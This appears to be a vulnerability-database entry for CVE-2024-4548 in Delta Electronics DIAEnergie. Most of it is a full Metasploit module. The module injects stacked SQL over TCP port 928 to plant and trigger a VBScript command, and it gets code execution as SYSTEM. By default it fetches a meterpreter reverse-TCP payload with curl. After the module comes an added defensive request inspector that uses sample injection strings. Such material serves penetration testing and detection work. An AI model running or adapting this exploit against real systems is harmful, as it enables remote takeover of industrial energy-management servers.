DIAEnergie SQL Injection (CVE-2024-4548)

Published: 21 Aug 2024 18:52:10
Reported by: Michael Heinzl, Tenable
Type: metasploit
Source: www.rapid7.com
Views: 308

SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics, exploitable by an unauthenticated remote attacker to gain arbitrary code execution.

Related

Reporter      Title                                                                      Published          Family
0day.today    DIAEnergie 1.10 SQL Injection Exploit                                      22 Aug 2024 00:00  zdt
Circl         CVE-2024-4548                                                              21 Aug 2024 14:03  circl
CNNVD         Delta Electronics DIAEnergie SQL Injection Vulnerability                   6 May 2024 00:00   cnnvd
CNVD          Delta Electronics DIAEnergie SQL Injection Vulnerability (CNVD-2024-29663) 10 May 2024 00:00  cnvd
CVE           CVE-2024-4548                                                              6 May 2024 13:51   cve
Cvelist       CVE-2024-4548 Delta Electronics DIAEnergie SQL Injection                   6 May 2024 13:51   cvelist
NVD           CVE-2024-4548                                                              6 May 2024 14:15   nvd
OSV           CVE-2024-4548                                                              6 May 2024 14:15   osv
Packet Storm  DIAEnergie 1.10 SQL Injection                                              22 Aug 2024 00:00  packetstorm
Packet Storm  DIAEnergie 1.10 SQL Injection                                              4 Mar 2025 00:00   packetstorm

Code
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',
        'Description' => %q{
          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Michael Heinzl', # MSF exploit
          'Tenable' # Discovery & PoC
        ],
        'References' => [
          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],
          [ 'CVE', '2024-4548']
        ],
        'DisclosureDate' => '2024-05-06',
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => {
                'FETCH_COMMAND' => 'CURL',
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
              },
              'Type' => :win_fetch
            }
          ]
        ],
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(928)
      ]
    )
  end

  # Determine if the DIAEnergie version is vulnerable.
  # The CEBC service answers the plain-text probe 'Who is it?' with a banner that
  # carries a four-part version string; builds at or below 1.10.1.8610 are
  # reported as likely vulnerable, newer builds as safe.
  def check
    begin
      connect
      sock.put 'Who is it?'
      res = sock.get || ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown('Connection failed')
    ensure
      disconnect
    end

    if res.empty?
      vprint_status('Received an empty response.')
      return Exploit::CheckCode::Unknown('Received an empty response')
    end

    vprint_status('Who is it response: ' + res.to_s)
    # Match a dotted four-part version (e.g. 1.10.1.8610) anywhere in the banner
    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
    version = res.match(version_pattern)

    if version.nil?
      return Exploit::CheckCode::Detected('DIAEnergie service detected but could not determine version')
    end

    vprint_status('Version retrieved: ' + version[0])

    # Rex::Version compares the dotted components numerically, not as strings
    unless Rex::Version.new(version[0]) <= Rex::Version.new('1.10.1.8610')
      return CheckCode::Safe("Version #{version[0]} is not vulnerable")
    end

    return CheckCode::Appears("Version #{version[0]} appears vulnerable")
  end

  def exploit
    execute_command(payload.encoded)
  end

  # Three round trips on the CEBC port, each on a fresh connection:
  #   1. RecalculateHDMWYC with a stacked INSERT into DIAE_script, storing a
  #      VBScript one-liner (WScript.Shell -> cmd /c <payload>) under a random name;
  #   2. RecalculateScript, which makes the service run the stored scripts
  #      (as NT AUTHORITY\SYSTEM);
  #   3. RecalculateHDMWYC again with a stacked DELETE to remove the row.
  # The injection point is the third operand: '1)' closes the parenthesis the
  # service puts around it, ';' starts a new statement and '--' comments out the
  # remainder of the original query. The module treats the server's "too many
  # closing parentheses" error as the expected reply for the injected requests.
  def execute_command(cmd)
    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
    vprint_status('Using random script name: ' + scname)

    # Randomised date/time operands so the requests do not look identical.
    # Note: day 29 combined with month 02 in a non-leap year (2025, 2026) is not
    # a valid calendar date; the module does not guard against that combination.
    year = rand(2024..2026)
    month = sprintf('%02d', rand(1..12))
    day = sprintf('%02d', rand(1..29))
    random_date = "#{year}-#{month}-#{day}"
    vprint_status('Using random date: ' + random_date)

    hour = sprintf('%02d', rand(0..23))
    minute = sprintf('%02d', rand(0..59))
    second = sprintf('%02d', rand(0..59))
    random_time = "#{hour}:#{minute}:#{second}"
    vprint_status('Using random time: ' + random_time)

    # Inject payload
    begin
      print_status('Sending SQL injection...')
      connect
      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")
      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end

      vprint_status('Injection - Expected response received: ' + res.to_s)
      disconnect

      # Trigger: ask the service to run the stored scripts, including ours
      print_status('Triggering script execution...')
      connect
      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"
      res = sock.get
      unless res.to_s == 'Recalculate Script Start!'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Trigger - Expected response received: ' + res.to_s)

      disconnect

      print_good('Script successfully injected, check thy shell.')
    ensure
      # Cleanup: remove the stored script row even if the trigger step failed
      print_status('Cleaning up database...')
      connect
      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Cleanup - Expected response received: ' + res.to_s)

      disconnect
    end
  end
end
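The module above shows the injection point from the attacker's side: the third operand of a RecalculateHDMWYC request is concatenated into a query, so "1);<statement>;--" closes the parenthesis and stacks a second statement. The following is an added example, not part of the Metasploit module or of DIAEnergie, of what a defender can do with that knowledge: a small inspector for the tilde-delimited requests the module sends to TCP/928, usable over captured request lines (IDS or proxy logging) or as the allow-list validation the service side should apply before any SQL is built. The field roles (command, start datetime, end datetime, one integer) are inferred from the module's traffic and are an assumption; the sample requests are constructed to mirror the module's messages.

```ruby
# Added example (not part of the Metasploit module above): inspect CEBC
# Recalculate* requests for operands that are not the plain datetime / integer
# values the service appears to expect.
# Assumption (inferred from the module's traffic, not from DIAEnergie source):
# a request is "Command~start~end~n" with start/end as "YYYY-MM-DD HH:MM:SS"
# and n a plain integer.
require 'date'

CEBC_PORT = 928 # port the module targets (Opt::RPORT(928))
RECALC_COMMANDS = %w[RecalculateHDMWYC RecalculateScript].freeze
DATETIME_RE = /\A\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\z/
INTEGER_RE  = /\A\d+\z/
# Signature of the technique the module uses: close the parenthesis the
# service opened, then stack a second statement.
STACKED_STMT_RE = /\)\s*;\s*(INSERT|DELETE|UPDATE|EXEC)\b/i

# Split "Command~op1~op2~op3" into its parts; -1 keeps trailing empty fields.
def parse_cebc(line)
  command, *operands = line.split('~', -1)
  { command: command, operands: operands }
end

# Strict datetime check: the regex fixes the shape, strptime rejects
# impossible dates such as 2025-02-29.
def valid_datetime?(str)
  return false unless str.match?(DATETIME_RE)
  DateTime.strptime(str, '%Y-%m-%d %H:%M:%S')
  true
rescue ArgumentError
  false
end

# Returns an array of findings; an empty array means the request is well-formed.
# Requests that are not Recalculate* commands (e.g. the 'Who is it?' probe) are
# not judged here.
def inspect_cebc(line)
  req = parse_cebc(line)
  return [] unless RECALC_COMMANDS.include?(req[:command])

  ops = req[:operands]
  findings = []
  findings << "expected 3 operands, got #{ops.length}" unless ops.length == 3
  ops.first(2).each_with_index do |op, i|
    findings << "operand #{i + 1} is not a datetime: #{op.inspect}" unless valid_datetime?(op)
  end
  if ops[2] && !ops[2].match?(INTEGER_RE)
    findings << "operand 3 is not an integer: #{ops[2][0, 40].inspect}"
  end
  findings << 'stacked SQL statement after closing parenthesis' if line.match?(STACKED_STMT_RE)
  findings << 'touches DIAE_script (script persistence)' if line.match?(/DIAE_script/i)
  findings
end

# Constructed sample requests modelled on the module's traffic (not captures).
SAMPLES = {
  benign:    'RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1',
  trigger:   'RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~1',
  injection: "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);" \
             "INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) " \
             "VALUES(N'abc', N'CreateObject(\"WScript.shell\").run(\"cmd /c whoami\")', N'', N'');--",
  cleanup:   "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);" \
             "DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='abc';--",
  bad_date:  'RecalculateHDMWYC~2025-02-29 00:00:00~2025-03-01 00:00:00~1',
  banner:    'Who is it?'
}.freeze

if $PROGRAM_NAME == __FILE__
  SAMPLES.each do |label, line|
    findings = inspect_cebc(line)
    puts "#{label}: #{findings.empty? ? 'ok' : findings.join('; ')}"
  end
end
```

The shape checks alone already reject both the INSERT and the DELETE request, because neither third operand is an integer; the STACKED_STMT_RE and DIAE_script signatures only name the technique for triage. Allow-list validation of this kind reduces exposure, but the actual fix for the service is to pass the operands to SQL Server as parameters rather than concatenating them into the query text.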


Scores (as of 06 Jun 2026 19:01, current)
Vulners AI Score: 9.7 (High risk)
CVSS 3.1: 9.8
EPSS: 0.48376
Views: 308